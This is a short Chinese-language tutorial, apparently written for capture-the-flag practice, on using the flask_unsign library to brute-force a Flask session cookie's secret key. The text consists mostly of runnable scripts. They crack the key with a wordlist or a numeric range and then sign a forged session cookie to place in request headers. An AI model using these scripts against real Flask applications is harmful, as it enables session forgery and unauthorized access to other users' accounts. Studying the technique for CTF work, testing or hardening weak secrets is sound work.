用flask_unsign爆破cookie或session

启动：

python -m pip install flask_unsign
python -m pip install flask_unsign_wordlist

爆破cookie生成私钥：

from flask_unsign import Cracker, logger, DEFAULT_WORDLIST
from flask_unsign.helpers import wordlist

cookie = 'eyJ1c2VybmFtZSI6Imd1ZXN0In0.ZcJSFQ.1hGqXUp2ShF_fZMMfz2htjO7Kz4'

crack = Cracker(value=cookie, threads=8)  # 使用默认 salt，threads为线程量

with wordlist(DEFAULT_WORDLIST) as iterator:
    crack.crack(iterator)

if crack.secret:
    logger.success(f'Found secret key after {crack.attempts} attempts') #crack.attempts为尝试次数
    secret_key = crack.secret.decode('utf-8', errors='ignore')
    print("SECRET_KEY:", secret_key)  

//wordlist(DEFAULT_WORDLIST)中DEFAULT_WORDLIST可以用任意字典的存储路径代替
//wordlist(DEFAULT_WORDLIST)整体可以用一个可迭代对象代替，如一个生成器
//candidates = (str(i).encode() for i in range(1, 1000))
//crack.crack(candidates)
//密钥爆破后原始为字节，需要解码

利用爆破出来的私钥生成新的cookie

from flask_unsign import session
sec_session = session.sign(
      value={"username": "guest"},
      secret=secret_key,
)
print(sec_session)    
#secret若无特殊要求，值应为爆破cookie生成的密钥
#sec_session值为cookie可添加入header头部

完整流程：

from flask_unsign import Cracker, logger, DEFAULT_WORDLIST
from flask_unsign.helpers import wordlist
from flask_unsign import session

cookie = "eyJ1c2VybmFtZSI6Imd1ZXN0In0.ZcJSFQ.1hGqXUp2ShF_fZMMfz2htjO7Kz4"

crack = Cracker(value=cookie, threads=8)  # 使用默认 salt

inex = (str(i).encode() for i in range(233000, 234000))

crack.crack(inex)

if crack.secret:
    logger.success(f"Found secret key after {crack.attempts} attempts")
    secret_key = crack.secret.decode("utf-8", errors="ignore")
    print("SECRET_KEY:", secret_key)
    sec_session = session.sign(
        value={"username": "guest"},
        secret=secret_key,
    )
    print(sec_session)